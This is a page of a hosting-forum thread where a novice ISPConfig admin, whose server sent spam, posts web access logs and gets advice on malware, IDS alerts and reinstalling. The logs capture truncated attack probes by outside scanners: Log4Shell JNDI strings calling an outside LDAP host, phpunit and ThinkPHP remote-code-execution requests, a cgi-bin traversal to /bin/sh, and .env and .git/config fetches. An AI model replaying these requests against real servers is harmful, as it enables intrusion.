My mail send spam from localhost[127.0.0.1] client from helo=mega.nz

Discussion in 'General' started by Alexcho, Dec 27, 2021.

Page 2 of 2
  1. Alexcho

    Alexcho New Member

    Client 2:
    Code:
    64.62.197.212 - - [29/Dec/2021:00:16:20 +0000] "GET / HTTP/1.1" 200 7730 "-" "-"                           
195.54.160.149 - -[29/Dec/2021:00:27:02 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Bas>
109.237.103.118 - -[29/Dec/2021:02:45:39 +0000] "GET / HTTP/1.0" 400 528 "-" "-"                            
109.237.103.118 - -[29/Dec/2021:02:45:39 +0000] "GET /.git/config HTTP/1.1" 404 6033 "-" "Mozilla/5.0 (X11; >
109.237.103.123 - -[29/Dec/2021:03:38:37 +0000] "GET /.env HTTP/1.1" 404 6033 "-" "Mozilla/5.0 (X11; Linux x>
167.94.138.59 - - [29/Dec/2021:04:50:16 +0000] "GET / HTTP/1.1" 200 8302 "-" "-"                             
167.94.138.59 - -[29/Dec/2021:04:50:17 +0000] "GET / HTTP/1.1" 200 7317 "-" "Mozilla/5.0 (compatible; Censys>
185.162.235.164 - -[29/Dec/2021:05:10:19 +0000] "GET /api/productConfig HTTP/1.1" 404 5909 "-" "Mozilla/5.0 >
61.219.11.151 - -[29/Dec/2021:05:10:47 +0000] "GET / HTTP/1.0" 400 528 "-" "-"                               
104.206.128.26 - -[29/Dec/2021:07:25:27 +0000] "GET / HTTP/1.1" 200 7730 "-" "https://gdnplus.com:Gather Ana>
85.214.234.232 - -[29/Dec/2021:07:40:36 +0000] "GET / HTTP/1.1" 200 6397 "-" "Mozilla/5.0 (Windows NT 5.1; r>
85.214.234.232 - -[29/Dec/2021:07:40:36 +0000] "GET /HNAP1/ HTTP/1.1" 404 5568 "https://78.83.83.26/" "Mozil>
195.154.87.159 - -[29/Dec/2021:08:03:43 +0000] "GET /wp-login.php HTTP/1.1" 404 360 "-" "Mozilla/5.0 (X11; U>
192.241.212.172 - -[29/Dec/2021:08:37:45 +0000] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.e>
192.241.212.101 - -[29/Dec/2021:08:45:53 +0000] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/>
188.95.55.106 - -[29/Dec/2021:10:20:28 +0000] "GET / HTTP/1.1" 200 1218 "-" "python-requests/2.22.0"       
 188.95.55.106 - -[29/Dec/2021:10:20:28 +0000] "GET / HTTP/1.1" 200 6886 "-" "python-requests/2.22.0"        
64.246.165.190 - -[29/Dec/2021:10:55:21 +0000] "GET /robots.txt HTTP/1.0" 200 270 "-" "Mozilla/5.0 (Macintos>
64.246.165.190 - -[29/Dec/2021:10:55:21 +0000] "GET / HTTP/1.1" 200 1181 "-" "Mozilla/5.0 (Macintosh; Intel >
195.54.160.149 - -[29/Dec/2021:11:33:12 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT>
198.199.94.190 - -[29/Dec/2021:12:07:15 +0000] "GET /actuator/health HTTP/1.1" 404 5909 "-" "Mozilla/5.0 zgr>
195.54.160.149 - -[29/Dec/2021:12:13:55 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP>
195.54.160.149 - -[29/Dec/2021:13:03:50 +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function>
195.54.160.149 - -[29/Dec/2021:13:34:48 +0000] "GET /?XDEBUG_SES
SION_START=phpstorm HTTP/1.1" 200 7324 "-" ">
156.146.50.181 - -[29/Dec/2021:14:06:31 +0000] "OPTIONS / HTTP/1.1" 200 5860 "-" "Mozilla/5.0 (Macintosh; In>
103.203.57.29 - -[29/Dec/2021:14:41:50 +0000] "GET / HTTP/1.1" 200 7324 "-" "Mozilla/5.0 (Windows NT 10.0; W>
109.237.103.38 - - [29/Dec/2021:15:19:36 +0000] "GET / HTTP/1.0" 400 528 "-" "-"                             
109.237.103.38 - -[29/Dec/2021:15:19:36 +0000] "GET /.env HTTP/1.1" 404 6080 "-" "Mozilla/5.0 (X11; Linux x8>
195.54.160.149 - -[29/Dec/2021:16:04:05 +0000] "GET /console/ HTTP/1.1" 404 6507 "-" "Mozilla/5.0 (Windows N>
195.54.160.149 - -[29/Dec/2021:17:03:23 +0000] "GET /_ignition/execute-solution HTTP/1.1" 404 6507 "-" "Mozi>
66.249.64.58 - -[29/Dec/2021:17:27:43 +0000] "GET /ads.txt HTTP/1.1" 404 6544 "-" "Mozilla/5.0 (compatible; >
192.241.207.109 - -[29/Dec/2021:17:28:35 +0000] "GET / HTTP/1.1" 200 6738 "-" "Mozilla/5.0 zgrab/0.x"       
176.53.222.136 - -[29/Dec/2021:17:56:58 +0000] "GET / HTTP/1.1" 200 6842 "-" "Mozilla/5.0 (Windows NT 10.0; >
176.53.222.136 - -[29/Dec/2021:17:56:58 +0000] "GET /favicon.ico HTTP/1.1" 200 7632 "-" "Mozilla/5.0 (Window>
195.54.160.149 - -[29/Dec/2021:19:08:16 +0000] "GET / HTTP/1.1" 200 7324 "-" "Mozilla/5.0 (Windows NT 10.0; >
195.54.160.149 - -[29/Dec/2021:19:25:38 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 6539 >
178.239.21.103 - -[29/Dec/2021:19:49:42 +0000] "GET ///libs/js/iframe.js HTTP/1.1" 404 5624 "-" "python-requ>
195.54.160.149 - -[29/Dec/2021:20:10:19 +0000] "GET / HTTP/1.1" 200 7324 "-" "Mozilla/5.0 (Windows NT 10.0; >
121.5.147.119 - -[29/Dec/2021:20:13:11 +0000] "GET / HTTP/1.1" 200 7324 "-" "Mozilla/5.0 (Linux; Android 6.0>
107.180.124.232 - -[29/Dec/2021:20:15:03 +0000] "GET /wp-login.php HTTP/1.1" 404 360 "-" "Mozilla/5.0 (X11; >
18.205.72.90 - -[29/Dec/2021:20:36:25 +0000] "GET / HTTP/1.1" 200 7424 "-" "Mozilla/5.0+(compatible; MxToolb>
18.205.72.90 - -[29/Dec/2021:20:36:25 +0000] "GET / HTTP/1.1" 200 2300 "-" "Mozilla/5.0+(compatible; MxToolb>
195.54.160.149 - -[29/Dec/2021:21:20:03 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Bas>
66.249.64.58 - -[29/Dec/2021:21:27:10 +0000] "GET /robots.txt HTTP/1.1" 200 6450 "-" "Mozilla/5.0 (compatibl>
52.42.94.2 - -[29/Dec/2021:22:44:57 +0000] "GET / HTTP/1.1" 200 1218 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64>
192.241.211.144 - -[29/Dec/2021:22:52:15 +0000] "GET /owa/auth/x.js HTTP/1.1" 404 5909 "-" "Mozilla/5.0 zgra>
192.241.209.65 - -[29/Dec/2021:22:54:07 +0000] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.ex>
192.241.213.120 - -[29/Dec/2021:22:55:32 +0000] "GET /owa/auth/logon.aspx HTTP/1.1" 404 5909 "-" "Mozilla/5.>
    Other access log for client 2
    Code:
    208.138.25.30 - - [30/Dec/2021:05:14:53 +0000] "GET / HTTP/1.0" 400 528 "-" "-"                             
154.212.160.170 - - [30/Dec/2021:07:02:27 +0000] "HEAD /wp-content/plugins/mstore-api/assets/js/mstore-inspir>
109.248.6.86 - - [30/Dec/2021:07:58:44 +0000] "GET / HTTP/1.0" 200 7798 "-" "masscan-ng/1.3 (https://github.c>
195.54.160.149 - - [30/Dec/2021:08:20:42 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT>
192.241.213.228 - - [30/Dec/2021:08:40:21 +0000] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.e>
192.241.212.227 - - [30/Dec/2021:08:48:47 +0000] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/>
195.54.160.149 - - [30/Dec/2021:08:54:51 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP>
195.54.160.149 - - [30/Dec/2021:10:01:16 +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function>
192.241.214.210 - - [30/Dec/2021:12:09:22 +0000] "GET /actuator/health HTTP/1.1" 404 5909 "-" "Mozilla/5.0 zg>
216.218.206.69 - - [30/Dec/2021:12:39:53 +0000] "GET / HTTP/1.1" 200 7730 "-" "-"                           
195.54.160.149 - - [30/Dec/2021:13:00:41 +0000] "GET /console/ HTTP/1.1" 404 6507 "-" "Mozilla/5.0 (Windows N>
195.54.160.149 - - [30/Dec/2021:13:24:54 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 6507 "-" ">
66.228.32.204 - - [30/Dec/2021:14:08:15 +0000] "GET / HTTP/1.0" 400 528 "-" "-"                             
209.141.53.74 - - [30/Dec/2021:14:35:47 +0000] "GET / HTTP/1.0" 400 528 "-" "-"                             
195.54.160.149 - - [30/Dec/2021:14:46:01 +0000] "GET / HTTP/1.1" 200 7324 "-" "Mozilla/5.0 (Windows NT 10.0; >
195.54.160.149 - - [30/Dec/2021:15:35:47 +0000] "GET / HTTP/1.1" 200 7324 "-" "Mozilla/5.0 (Windows NT 10.0; >
195.54.160.149 - - [30/Dec/2021:16:40:08 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 6539 >
    Yesterday log for client 2
    Code:
    64.62.197.212 - - [29/Dec/2021:00:16:20 +0000] "GET / HTTP/1.1" 200 7730 "-" "-"                            
195.54.160.149 - - [29/Dec/2021:00:27:02 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Bas>
109.237.103.118 - - [29/Dec/2021:02:45:39 +0000] "GET / HTTP/1.0" 400 528 "-" "-"                           
109.237.103.118 - - [29/Dec/2021:02:45:39 +0000] "GET /.git/config HTTP/1.1" 404 6033 "-" "Mozilla/5.0 (X11; >
109.237.103.123 - - [29/Dec/2021:03:38:37 +0000] "GET /.env HTTP/1.1" 404 6033 "-" "Mozilla/5.0 (X11; Linux x>
167.94.138.59 - - [29/Dec/2021:04:50:16 +0000] "GET / HTTP/1.1" 200 8302 "-" "-"                            
167.94.138.59 - - [29/Dec/2021:04:50:17 +0000] "GET / HTTP/1.1" 200 7317 "-" "Mozilla/5.0 (compatible; Censys>
185.162.235.164 - - [29/Dec/2021:05:10:19 +0000] "GET /api/productConfig HTTP/1.1" 404 5909 "-" "Mozilla/5.0 >
61.219.11.151 - - [29/Dec/2021:05:10:47 +0000] "GET / HTTP/1.0" 400 528 "-" "-"                             
104.206.128.26 - - [29/Dec/2021:07:25:27 +0000] "GET / HTTP/1.1" 200 7730 "-" "https://gdnplus.com:Gather Ana>
85.214.234.232 - - [29/Dec/2021:07:40:36 +0000] "GET / HTTP/1.1" 200 6397 "-" "Mozilla/5.0 (Windows NT 5.1; r>
85.214.234.232 - - [29/Dec/2021:07:40:36 +0000] "GET /HNAP1/ HTTP/1.1" 404 5568 "https://78.83.83.26/" "Mozil>
195.154.87.159 - - [29/Dec/2021:08:03:43 +0000] "GET /wp-login.php HTTP/1.1" 404 360 "-" "Mozilla/5.0 (X11; U>
192.241.212.172 - - [29/Dec/2021:08:37:45 +0000] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.e>
192.241.212.101 - - [29/Dec/2021:08:45:53 +0000] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/>
188.95.55.106 - - [29/Dec/2021:10:20:28 +0000] "GET / HTTP/1.1" 200 1218 "-" "python-requests/2.22.0"      
 188.95.55.106 - - [29/Dec/2021:10:20:28 +0000] "GET / HTTP/1.1" 200 6886 "-" "python-requests/2.22.0"      
 64.246.165.190 - - [29/Dec/2021:10:55:21 +0000] "GET /robots.txt HTTP/1.0" 200 270 "-" "Mozilla/5.0 (Macintos>
64.246.165.190 - - [29/Dec/2021:10:55:21 +0000] "GET / HTTP/1.1" 200 1181 "-" "Mozilla/5.0 (Macintosh; Intel >
195.54.160.149 - - [29/Dec/2021:11:33:12 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT>
198.199.94.190 - - [29/Dec/2021:12:07:15 +0000] "GET /actuator/health HTTP/1.1" 404 5909 "-" "Mozilla/5.0 zgr>
195.54.160.149 - - [29/Dec/2021:12:13:55 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP>
195.54.160.149 - - [29/Dec/2021:13:03:50 +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function>
195.54.160.149 - - [29/Dec/2021:13:34:48 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 7324 "-" ">
156.146.50.181 - - [29/Dec/2021:14:06:31 +0000] "OPTIONS / HTTP/1.1" 200 5860 "-" "Mozilla/5.0 (Macintosh; In>
103.203.57.29 - - [29/Dec/2021:14:41:50 +0000] "GET / HTTP/1.1" 200 7324 "-" "Mozilla/5.0 (Windows NT 10.0; W>
109.237.103.38 - - [29/Dec/2021:15:19:36 +0000] "GET / HTTP/1.0" 400 528 "-" "-"                            
109.237.103.38 - - [29/Dec/2021:15:19:36 +0000] "GET /.env HTTP/1.1" 404 6080 "-" "Mozilla/5.0 (X11; Linux x8>
195.54.160.149 - - [29/Dec/2021:16:04:05 +0000] "GET /console/ HTTP/1.1" 404 6507 "-" "Mozilla/5.0 (Windows N>
195.54.160.149 - - [29/Dec/2021:17:03:23 +0000] "GET /_ignition/execute-solution HTTP/1.1" 404 6507 "-" "Mozi>
66.249.64.58 - - [29/Dec/2021:17:27:43 +0000] "GET /ads.txt HTTP/1.1" 404 6544 "-" "Mozilla/5.0 (compatible; >
192.241.207.109 - - [29/Dec/2021:17:28:35 +0000] "GET / HTTP/1.1" 200 6738 "-" "Mozilla/5.0 zgrab/0.x"     
 176.53.222.136 - - [29/Dec/2021:17:56:58 +0000] "GET / HTTP/1.1" 200 6842 "-" "Mozilla/5.0 (Windows NT 10.0; >
176.53.222.136 - - [29/Dec/2021:17:56:58 +0000] "GET /favicon.ico HTTP/1.1" 200 7632 "-" "Mozilla/5.0 (Window>
195.54.160.149 - - [29/Dec/2021:19:08:16 +0000] "GET / HTTP/1.1" 200 7324 "-" "Mozilla/5.0 (Windows NT 10.0; >
195.54.160.149 - - [29/Dec/2021:19:25:38 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 6539 >
178.239.21.103 - - [29/Dec/2021:19:49:42 +0000] "GET ///libs/js/iframe.js HTTP/1.1" 404 5624 "-" "python-requ>
195.54.160.149 - - [29/Dec/2021:20:10:19 +0000] "GET / HTTP/1.1" 200 7324 "-" "Mozilla/5.0 (Windows NT 10.0; >
121.5.147.119 - - [29/Dec/2021:20:13:11 +0000] "GET / HTTP/1.1" 200 7324 "-" "Mozilla/5.0 (Linux; Android 6.0>
107.180.124.232 - - [29/Dec/2021:20:15:03 +0000] "GET /wp-login.php HTTP/1.1" 404 360 "-" "Mozilla/5.0 (X11; >
18.205.72.90 - - [29/Dec/2021:20:36:25 +0000] "GET / HTTP/1.1" 200 7424 "-" "Mozilla/5.0+(compatible; MxToolb>
18.205.72.90 - - [29/Dec/2021:20:36:25 +0000] "GET / HTTP/1.1" 200 2300 "-" "Mozilla/5.0+(compatible; MxToolb>
195.54.160.149 - - [29/Dec/2021:21:20:03 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Bas>
66.249.64.58 - - [29/Dec/2021:21:27:10 +0000] "GET /robots.txt HTTP/1.1" 200 6450 "-" "Mozilla/5.0 (compatibl>
52.42.94.2 - - [29/Dec/2021:22:44:57 +0000] "GET / HTTP/1.1" 200 1218 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64>
192.241.211.144 - - [29/Dec/2021:22:52:15 +0000] "GET /owa/auth/x.js HTTP/1.1" 404 5909 "-" "Mozilla/5.0 zgra>
192.241.209.65 - - [29/Dec/2021:22:54:07 +0000] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.ex>
192.241.213.120 - - [29/Dec/2021:22:55:32 +0000] "GET /owa/auth/logon.aspx HTTP/1.1" 404 5909 "-" "Mozilla/5.>
    I cannot copy the error log for client2.

    Sorry for my long messages, i work from phone and don't know how can i upload files from ubuntu server to android.

    So.... What Can i do with this error from the ispconfig. What i have to do right now. Can i turn on again my SMTP connection and how? It's no problem to reinstall the server, but the point for me is to learn how to resolve problems. I'm new in ubuntu maybe from 5-6 months and sorry for stuped questions...
     
    Last edited: Dec 31, 2021
    Alexcho, Dec 30, 2021
    #21
  2. Taleman

    Taleman Well-Known Member HowtoForge Supporter

    You should find the malware on that website and remove it.
    And: Please post listings and logs in CODE tags so they are more readable.
     
    Taleman, Dec 31, 2021
    #22
    Alexcho likes this.
  3. till

    till Super Moderator Staff Member ISPConfig Developer

    The ISPConfig IDS alerts might be false positives though. It might be that there is just a special combination of chars in the ssl cert (which is very uncommon but possible) that triggers the IDS scan. Is this a self signed ssl cert or is it a cert that you bought somewhere? If it's just a self-signed cert, then you can try to create a new self-signed cert to see if the IDS alert is triggered again, or disable IDS alerts for admin user temporarily in /usr/local/ispconfig/security/security_settings.ini
    This is not a solution for your spam sending problems though, which needs to be investigated further.
     
    till, Dec 31, 2021
    #23
    Alexcho likes this.
  4. Alexcho

    Alexcho New Member

    I deleted all sites earlier, so i haven't any site on this panel anymore.
    And i will edit all my posts with CODE. Thanks!
     
    Alexcho, Dec 31, 2021
    #24
  5. Alexcho

    Alexcho New Member

    This ssl is from panel. I made new one and the error is gone!
    And i block port 25 outgoing connections also.
    Does UUCP user need SSH connection? I block all connections, only my ips give allow permissions.
     
    Last edited: Dec 31, 2021
    Alexcho, Dec 31, 2021
    #25
  6. Jesse Norell

    Jesse Norell Well-Known Member Staff Member Howtoforge Staff

    No, no one should ever log in as uucp, and that is not normally allowed. Your server may be more compromised than just an individual website, you might consider reinstalling from scratch if you don't have any sites on it anyways.
     
    Jesse Norell, Dec 31, 2021
    #26
    Alexcho likes this.
  7. Alexcho

    Alexcho New Member

    It's not problem for reinstall. But is better to learn something. It was a great lesson for me and someone else, I hope. I have to reinstall it anyway, because I've changed a lot of things ... The point was to pick it up after someone dropped it down. Now I'll try to unblock my ip from many blacklists and learn something else if have. In the end will make a clean installation. Thank you all for your help! If anyone is thinking of adding something - welcome! Happy New Year! Be alive and healthy and good luck! CHEERS!
     
    Alexcho, Dec 31, 2021
    #27
    till likes this.
Page 2 of 2

Share This Page